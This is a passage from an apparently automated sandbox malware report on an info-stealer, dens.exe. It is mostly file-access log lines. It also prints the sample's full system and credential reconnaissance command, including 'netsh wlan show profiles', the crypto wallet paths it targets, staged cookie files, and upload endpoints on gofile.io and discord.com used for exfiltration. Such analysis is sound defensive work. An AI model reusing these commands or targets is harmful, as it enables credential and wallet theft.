            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_socket.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\select.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\Desktop\dens.exe VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_lzma.pyd VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_wmi.pyd VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_queue.pyd VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_hashlib.pyd VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_ssl.pyd VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\pyexpat.pyd VolumeInformation
            Source: C:\Windows\System32\net1.exe Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\dens.exe Code function: 0_2_00007FF62C0FD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF62C0FD010
            Source: C:\Users\user\Desktop\dens.exe Code function: 0_2_00007FF62C115C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF62C115C00

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\dens.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ollydbg.exe
            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match, File source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Cookies.txt
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Firefox\History.txt
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\network_info.txt
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\system_info.txt
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\process_info.txt
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Electrum":
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Jaxx": os.path.join(self.RoamingAppData, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb"),
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Exodus": "aholpfdialjgjfhomihkjbmgjidlcdno",
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
            Source: C:\Users\user\Desktop\dens.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Users\user\Desktop\dens.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

            Remote Access Functionality

            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dens.exe PID: 6500, type: MEMORYSTR
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
            Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: 341 Windows Management Instrumentation; 1 Native API; 12 Command and Scripting Interpreter; 1 Service Execution; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
            Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 1 Windows Service; 11 Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Defense Evasion: 2 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 1 Valid Accounts; 151 Virtualization/Sandbox Evasion; 11 Process Injection; Dynamic API Resolution
            Credential Access: 1 OS Credential Dumping; 1 GUI Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: 12 System Time Discovery; 2 System Network Connections Discovery; 2 File and Directory Discovery; 56 System Information Discovery; 571 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 31 System Network Configuration Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
            Collection: 1 Archive Collected Data; 3 Data from Local System; 1 GUI Input Capture; 1 Email Collection; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Command and Control: 3 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Impact: 1 Data Encrypted for Impact; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
            [Figure: behavior graph. Behavior Graph ID: 1554825, Sample: dens.exe, Startdate: 13/11/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            dens.exe | 39% | ReversingLabs | Win64.Infostealer.Generic |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe | 39% | ReversingLabs | Win64.Infostealer.Generic |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://tidelift.com/badges/package/pypi/jaraco.context | 0% | Avira URL Cloud | safe |
            https://tidelift.com/subscription/pkg/pypi-inflect?utm_source=pypi-inflect&utm_medium=readme | 0% | Avira URL Cloud | safe |
            https://t.m | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            discord.com | 162.159.128.233 | true | false |  | high
            raw.githubusercontent.com | 185.199.108.133 | true | false |  | high
            ip-api.com | 208.95.112.1 | true | false |  | high
            store1.gofile.io | 45.112.123.227 | true | false |  | high
            api.gofile.io | 45.112.123.126 | true | false |  | high
            Name | Malicious | Antivirus Detection | Reputation
            http://ip-api.com/json | false |  | high
            Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                  https://github.com/pypa/packagingdens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://pypi.org/project/backports.tarfiledens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drfalse
                                                                                        high
                                                                                        https://readthedocs.org/projects/importlib-metadata/badge/?version=latestdens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://refspecs.linuxfoundation.org/elf/gabi4dens.exe, 00000001.00000003.1701168036.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701312245.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB26D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://store1.gofile.io/uploadFilexdens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://img.shields.io/pypi/pyversions/importlib_resources.svgdens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 00000052.00000002.1907212473.00000217BD754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1907212473.00000217BD611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://readthedocs.org/projects/backportstarfile/badge/?version=latestdens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drfalse
                                                                                                    high
                                                                                                    https://discord.com/api/v9/users/dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://blog.jaraco.com/skeletondens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drfalse
                                                                                                        high
                                                                                                        https://github.com/python-attrs/attrs/issues/136dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&badens.exe, 00000001.00000003.2032142839.000002D9ABE69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/platformdirs/platformdirsdens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://fsf.org/dens.exe, 00000000.00000003.1676624069.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://img.shields.io/pypi/pyversions/inflect.svgdens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
